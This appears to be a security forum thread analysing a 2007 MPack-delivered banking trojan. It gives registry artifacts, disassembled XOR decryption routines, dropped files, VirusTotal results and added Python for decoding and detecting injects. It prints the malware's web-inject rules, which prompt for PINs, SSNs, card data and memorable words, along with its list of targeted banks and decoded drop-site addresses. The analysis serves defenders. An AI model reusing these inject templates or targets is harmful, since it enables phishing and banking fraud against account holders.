MPack Malware Sample
Here is an example of the new Mpack malware that has been gaining momentum recently. Mpack gained notoriety as it is a commercial tool being distributed for pay. It is purported to attack the MS06-014, MS06-006, MS06-044, XML Overflow, WebViewFolderIcon Overflow, WinZip ActiveX Overflow and QuickTime Overflow vulnerabilities. SANS ISC and Verisign/iDefense have an email that has been circulating about this. The further commercialization of malware is continuing on both sides of the confrontation.
this is just another variant of infostealer.banker.d
http://www.symantec.com/security_response/writeup.jsp?docid=2007-052710-0541-99&tabid=2
here's some additional info on this special case:
the crypted info in the registry:
[HKEY_LOCAL_MACHINE\SOFTWARE\Helper]
"Dom"=hex:1d,03,0e,1a,07,11,05,07,16,1d,18,14,13,19,4e,4e,41
"DName"="HDZ♣OGG"
"GUID"="l$'RSS#TU:/UT&:#q.q:..V!:V!.$/R.VVTR'j"
is the following:
Dom= relaxrent.info/lim
DName = cimm.dll
GUID = {3644117A-821A-4cc4-ADD5-226A6694F722}
;DLL regkey-decrypter
MOV DWORD PTR SS:[EBP-0x4],EBX <--- ebx = crypted buffer
SUB DWORD PTR SS:[EBP-0x4],ESI <--- esi = decrypted buffer
L002:
MOV EAX,EDI
MOV EBX,0xFF
CDQ
IDIV EBX
MOV EAX,DWORD PTR SS:[EBP-0x4]
LEA ECX,DWORD PTR DS:[EDI+ESI]
MOV AL,BYTE PTR DS:[EAX+ECX]
XOR AL,DL <--- decrypt crypted byte with current edi value
INC EDI
CMP EDI,DWORD PTR SS:[EBP-0x8]
MOV BYTE PTR DS:[ECX],AL
JB L002
;DOM regkey-decrypter
; at address 0x20009d5c
; e.g. decrypts relaxrent.info/lim
PUSH 0x1
LEA EAX,DWORD PTR DS:[ESI+0x1]
POP EDX
SUB EDX,ESI
L004:
XOR BYTE PTR DS:[EAX-0x1],0x2B
XOR BYTE PTR DS:[EAX],0x36
XOR BYTE PTR DS:[EAX+0x1],0x20
ADD EAX,0x3
ADD ECX,0x3
LEA EBX,DWORD PTR DS:[EDX+EAX]
CMP EBX,EDI
JB L004
;DNAME-regkey decrypter
MOV ECX,DWORD PTR SS:[EBP+0x8] <--- string c:\windows\system32\cimm.dll
LEA EAX,DWORD PTR SS:[EBP-0x88] <--- crypted registry buffer
SUB EAX,ECX
MOV ESI,EDX
L004:
MOV DL,BYTE PTR DS:[EAX+ECX]
XOR DL,0x2B <--- decryption with 0x2b
MOV BYTE PTR DS:[ECX],DL
INC ECX
DEC ESI
JNZ L004
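The three listings above are plain XOR loops, so they can be reproduced in a few lines and checked against the registry values quoted earlier in this comment. The Python below is an added example written for this page, not code from the post or from the sample; function names are the editor's own, the starting value of EDI in the first routine is not shown in the listing and is assumed to be 0, and the example assumes every byte of the string is covered by the loop (the listing compares the counter against EDI, whose value is not shown). Applied to the "Dom" bytes quoted from HKLM\SOFTWARE\Helper, the 0x2B/0x36/0x20 routine yields an IP-style path rather than the relaxrent.info/lim example given above, which suggests the registry dump and the decryption example were taken from different runs of the sample. The DName value behaves the same way: the 0x2B routine turns "cimm.dll" into a string that begins with "H" and ends with 0x05,"OGG" (the ♣ in the post is the code-page rendering of 0x05), so the middle characters shown in the post were most likely mangled by the forum.

```python
"""Re-implementation of the three XOR decryption routines from the
disassembly above. Added example: not the post's or the sample's code;
helper names and the EDI start value are the editor's assumptions."""

# MOV EBX,0xFF / CDQ / IDIV EBX leaves EDI mod 255 in EDX
DLL_MODULUS = 0xFF


def dll_regkey_decrypt(buf: bytes, start_index: int = 0) -> bytes:
    """First routine: byte i is XORed with (i mod 0xFF), i counting from
    EDI's initial value (assumed 0; the listing does not show where EDI starts).
    XOR is its own inverse, so calling this twice returns the input."""
    return bytes(b ^ ((start_index + i) % DLL_MODULUS) for i, b in enumerate(buf))


# XOR [EAX-1],0x2B / XOR [EAX],0x36 / XOR [EAX+1],0x20, then ADD EAX,3
DOM_KEY = (0x2B, 0x36, 0x20)


def dom_decrypt(buf: bytes) -> bytes:
    """Second routine (at 0x20009d5c in the post): walks the buffer three
    bytes per iteration, XORing each byte with 0x2B, 0x36, 0x20 in turn.
    Assumption: the loop covers every byte up to the string length."""
    return bytes(b ^ DOM_KEY[i % 3] for i, b in enumerate(buf))


def dname_decrypt(buf: bytes) -> bytes:
    """Third routine: every byte XORed with the single key 0x2B."""
    return bytes(b ^ 0x2B for b in buf)


# "Dom" REG_BINARY value exactly as the post quotes it from HKLM\SOFTWARE\Helper
DOM_REG_HEX = "1d,03,0e,1a,07,11,05,07,16,1d,18,14,13,19,4e,4e,41"


def decode_dom_registry_value(hex_csv: str = DOM_REG_HEX) -> str:
    """Parse a comma-separated REG_BINARY hex dump and run it through dom_decrypt."""
    raw = bytes(int(h, 16) for h in hex_csv.split(","))
    return dom_decrypt(raw).decode("ascii")


if __name__ == "__main__":
    # Derived by running the routine on the post's own bytes:
    print("Dom   ->", decode_dom_registry_value())       # -> '65.111.166.48/new'
    # XOR routines are symmetric, so the same code also "encrypts":
    print("DName ->", dname_decrypt(b"cimm.dll"))         # -> b'HBFF\x05OGG'
    print("DLL   ->", dll_regkey_decrypt(dll_regkey_decrypt(b"relaxrent.info/lim")))
```

Because every routine is a fixed-key XOR, the same functions recover the plaintext from a registry export taken from an infected host without running the DLL, which is the usual way to pull the current drop site out of a sample during triage.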
the code which steals the whole protected storage data is completely copied
from this PoC:
Protected Storage
By Hirosh Joseph
http://www.codeproject.com/tools/HirPStorage.asp?df=100&forumid=33951&exp=0&select=985672
as well as the deflate.c for zipping stolen data:
http://www.cs.toronto.edu/~cosmin/pngtech/src/deflate/deflate.c
injects xml code into internet banking sites
The threat drops 5 files.
system32\alog.txt
system32\cimm.dll
system32\cookie.dat
system32\ps.dat
system32\help.txt
You must now"
what="
enter your password to prevent fraud.
Your password:
Now please
">
"
what="
ATM PIN:
"
block="alt=Go"
check="pin"
quan="4"
content="d"
>
"
what="
To prevent fraud enter your credit card information please:
Your ATM or Check Card Number:
Expiration Date:
(e.g. 07.2007)
ATM PIN:
Your mother's maiden name:
"
block="sign-on."
check="pin"
quan="4"
content="d"
>
"
what="
To prevent fraud enter your credit card information please:
Your ATM or Check Card Number:
Expiration Date (e.g. 07.2007)
CVV:
ATM PIN:
"
check="citipin"
>
"
what="
4. PIN:
"
block="Sign On"
check="pin"
quan="4"
content="d"
>
"
what="
Your ATM or Check Card Number:
"
check="ccnom"
>
"
what="
ATM PIN:
SSN:
"
block="LOG ON"
check="j_ssn"
quan="9"
content="d"
>
"
what="
To prevent fraud enter your email address:
Email:
"
check="email"
>
"
what="
"
check="answ2"
>
"
what="
Date Of Birth (mm/dd/yyyy):
Social Security number /SSN (xxxxxxxxx):
ATM PIN:
"
check="yssn"
>
Visa"
what="
Date Of Birth (mm/dd/yyyy):
Social Security number /SSN (xxxxxxxxx):
ATM PIN:
"
check="yatmpin"
>
"
what="
Place of birth:
First school attended:
Last school attended:
Memorable date:
Memorable name:
"
check="mword"
>
"
what="
Place of birth:
First school attended:
Last school attended:
Memorable date:
Memorable name:
"
check="mword"
>
"
what="
Place of birth:
First school attended:
Last school attended:
Memorable date:
Memorable name:
"
check="mword"
>
"
what="
Place of birth:
First school attended:
Last school attended:
Memorable date:
Memorable name:
">
"
what="
What is your favourite meal or restaurant?
The name of a memorable place to you?
Your favourite film of all time?
Your favourite book of all time?
Your favourite teacher or subject?
Your favourite TV star or show?
"
check="pswd"
>
"
what="
SSN:
MMN:
"
check="SSN"
>
"
what="
SSN:
MMN:
"
check="MMN"
>
"
what="
Firma
"
check="firma"
>
"
what="
Signature
"
check="efirma"
>
"
what="
Codice di Autorizzazione
"
check="efirma"
>
"
what="
password
"
check="PASSWD"
>
"
what="
Parola Chiave:
"
check="parola"
>
"
what="
Clave de firma:
"
check="firma"
>
"
what="
2*. Firma
"
check="firma"
>
"
what="
Clave de firma:
"
check="FIRMA"
>
"
what="
password dispositiva
"
check="passdeposit"
>
"
what=" Primo codice segreto
Secondo codice segreto
"
check="secondcod"
>
"
what="
P.I.N.
"
check="PIN"
>
"
what="
Password dispositiva
"
check="PASSDEP"
>
"
what="
Codice Dispositivo:
"
check="CodDep"
>
"
what="Codice OPERATIVO
"
check="codoperat"
>
"
what="
Secret answers for payment procession (question not displayed for security reasons).
Secret answer 1*
Secret answer 2*
"
check="answ2"
>
"
what="Clave de firma:
"
check="efirma"
>
"
what="
Clave de firma:
"
check="some"
>
"
what="
Ihres 6-stelligen DiBa-Keys
"
block="alt=anmelden"
check="KEYS"
content="d"
quan="6"
>
"
what="Clave de Operaciones
"
>
"
what="
Password
"
block="id=NextButton_button"
check="password"
>
"
what="
Password
"
block="id=NextButton_imageButton"
check="password"
>
"
what="
Memorable word
"
block="Sign in"
check="memword"
>
"
what="
Memorable Word
"
check="Memword"
>
"
what="
Memorable word
"
check="MEMWORD"
>
"
what="
memorable word
"
check="memword"
>
"
what="Memorable word
"
block="Next"
check="memo"
>
"
what="
Memorable word:
"
block="Next"
check="memmword"
>
"
what="
memorable year:
mother's maiden name:
"
check="MaidenName"
>
"
what="
Memorable Information
"
check="memword"
block="name=Logon"
>
"
what="
Your Date Of Birth e.g. 01/01/82
Your Password
"
check="pswd"
>
"
what="
Please enter your memorable word
"
check="memword"
block="name=loginButton"
>
"
what="
Passnumber*:
*
For security reasons, we will ask you both your full Passnumber and separate digits of it. This measure was introduced to prevent fraud.
"
check="passnumber"
block="Sign On Now"
>
"
what="
Memorable Information
"
check="memword"
block="alt=Next"
>
"
what="Please enter your password
"
check="password"
block="proceed"
>
"
what="
TAN:
"
>
"
what="
TAN:
"
>
"
what="
TAN:
"
>
"
what="
TAN :
"
>
"
what="
TAN:
"
>
"
what="
TAN:"
>
"
what="
Clave de Firma:
"
check="firma"
>
"
what="
Clave de Firma:
"
check="firma"
>
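The dump above is the bot's web-inject rule list with the element names stripped by the forum rendering; what survives is, per record, a multi-line what="..." prompt, then optional block=, check=, quan= and content= attributes, terminated by a line holding only ">". The Python below is an added example, not code from the post or from the sample: it parses that flattened layout into records and then uses them to flag a login form that carries an injected field. The reading of the attributes is the editor's assumption (what = the prompt text injected into the page, check = the name of the injected input the bot harvests from the POST, block = the submit control the inject waits for, quan = expected digit count, content="d" = digits only), the three records embedded below are copied verbatim from the dump, and the login page is constructed for the example.

```python
"""Parse the flattened inject rules shown in the post and use them to spot
injected form fields. Added example; attribute meanings are assumptions."""
import re
from html.parser import HTMLParser

# Three records copied verbatim from the dump above, as the post shows them.
SAMPLE_RULES = '''"
what="
ATM PIN:
"
block="alt=Go"
check="pin"
quan="4"
content="d"
>
"
what="
Your ATM or Check Card Number:
"
check="ccnom"
>
"
what="
Memorable word
"
block="Sign in"
check="memword"
>
'''

ATTR_RE = re.compile(r'(\w+)="([^"]*)"')  # [^"]* spans newlines, so what= works


def parse_inject_rules(text):
    """Split on lines holding only '>' and collect attr="value" pairs per record.
    Stray '"' lines left over from the stripped element are ignored because
    they are not preceded by an attribute name."""
    rules = []
    for chunk in re.split(r"^>$", text, flags=re.MULTILINE):
        attrs = {k: v.strip() for k, v in ATTR_RE.findall(chunk)}
        if "what" not in attrs:
            continue
        attrs["prompts"] = [ln.strip() for ln in attrs["what"].splitlines() if ln.strip()]
        if "quan" in attrs:
            attrs["quan"] = int(attrs["quan"])
        rules.append(attrs)
    return rules


class FormFieldCollector(HTMLParser):
    """Collect <input name=...> values and visible text from an HTML fragment."""

    def __init__(self):
        super().__init__()
        self.fields, self.text = [], []

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            name = dict(attrs).get("name")
            if name:
                self.fields.append(name)

    def handle_data(self, data):
        if data.strip():
            self.text.append(data.strip())


def find_injected_fields(html, rules):
    """Return (field_name, prompt) pairs where an input named after a rule's
    check= value appears together with one of that rule's what= prompts.
    Requiring both keeps a genuine field that merely shares a name (e.g.
    'password') from being reported."""
    collector = FormFieldCollector()
    collector.feed(html)
    page_text = " ".join(collector.text).lower()
    hits = []
    for rule in rules:
        name = rule.get("check")
        if name and name in collector.fields:
            prompt = next((q for q in rule["prompts"] if q.lower() in page_text), None)
            if prompt is not None:
                hits.append((name, prompt))
    return hits


# Constructed login page: a normal user/password form plus an injected PIN field.
CONSTRUCTED_LOGIN_PAGE = """
<form action="/login" method="post">
  <label>User ID</label><input name="userid">
  <label>Password</label><input name="passwd" type="password">
  <label>ATM PIN:</label><input name="pin" maxlength="4">
  <input type="submit" value="Go" alt="Go">
</form>
"""

if __name__ == "__main__":
    rules = parse_inject_rules(SAMPLE_RULES)
    print(len(rules), "rules parsed;", [r["check"] for r in rules])
    print(find_injected_fields(CONSTRUCTED_LOGIN_PAGE, rules))  # [('pin', 'ATM PIN:')]
```

The same two-part check (harvested field name plus its prompt text) is what a bank's own page-integrity monitoring or a proxy rule would compare against a rendered login page; the rendered DOM rather than the server's template is what has to be inspected, since the inject is applied in the browser after the genuine page has loaded.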
.ie
.ca
.co.uk
bankofamerica.com
barclays.com
abnamro-treasury.com
itl.net
coutts.com
ftbni.com
flemings.com
pb.grindlazs.com
hsbcib.com
hsbcgroup.com
worldserver.pipex.com/nationwide/
molb.com
scotiabank.com
hambrosbank.com
nolb.com
nationet.com
nwolb.com
natwest.com
rbsdigital.com
if.com
firstdirect.com
my.if.com
rbsdigital.com
online-offshore.lloydstsb.com
iblogin.com
myspace
Any idea how to decrypt the help.txt encrypted file?
Thanks.

Virustotal results
AhnLab-V3 2007.6.20.1 06.20.2007 no virus found
AntiVir 7.4.0.34 06.20.2007 TR/Drop.BHO.H
Authentium 4.93.8 06.21.2007 no virus found
Avast 4.7.997.0 06.20.2007 no virus found
AVG 7.5.0.467 06.20.2007 PSW.Banker3.OXA
BitDefender 7.2 06.21.2007 no virus found
CAT-QuickHeal 9.00 06.21.2007 no virus found
ClamAV devel-20070416 06.21.2007 no virus found
DrWeb 4.33 06.20.2007 no virus found
eSafe 7.0.15.0 06.20.2007 no virus found
eTrust-Vet 30.8.3730 06.20.2007 no virus found
Ewido 4.0 06.20.2007 Logger.Banker.cnx
FileAdvisor 1 06.21.2007 Not analyzed yet
Fortinet 2.91.0.0 06.21.2007 no virus found
F-Prot 4.3.2.48 06.21.2007 no virus found
F-Secure 6.70.13030.0 06.20.2007 Trojan-Spy.Win32.Banker.cpv
Ikarus T3.1.1.8 06.21.2007 MemScanTrojan.Spy.Banker.CNQ
Kaspersky 4.0.2.24 06.21.2007 Trojan-Spy.Win32.Banker.cpv
McAfee 5057 06.20.2007 no virus found
Microsoft 1.2607 06.21.2007 no virus found
NOD32v2 2342 06.21.2007 probably a variant of Win32/Spy.Banker.CKW
Norman 5.80.02 06.20.2007 W32/Malware.WGF
Panda 9.0.0.4 06.20.2007 Suspicious file
Prevx1 V2 06.21.2007 no virus found
Sophos 4.18.0 06.12.2007 Mal/Behav-112
Sunbelt 2.2.907.0 06.16.2007 Trojan.Nethell
Symantec 10 06.21.2007 no virus found
TheHacker 6.1.6.136 06.20.2007 no virus found
VBA32 3.12.0.2 06.20.2007 no virus found
VirusBuster 4.3.23:9 06.20.2007 no virus found
Webwasher-Gateway 6.0.1 06.20.2007 Trojan.Drop.BHO.H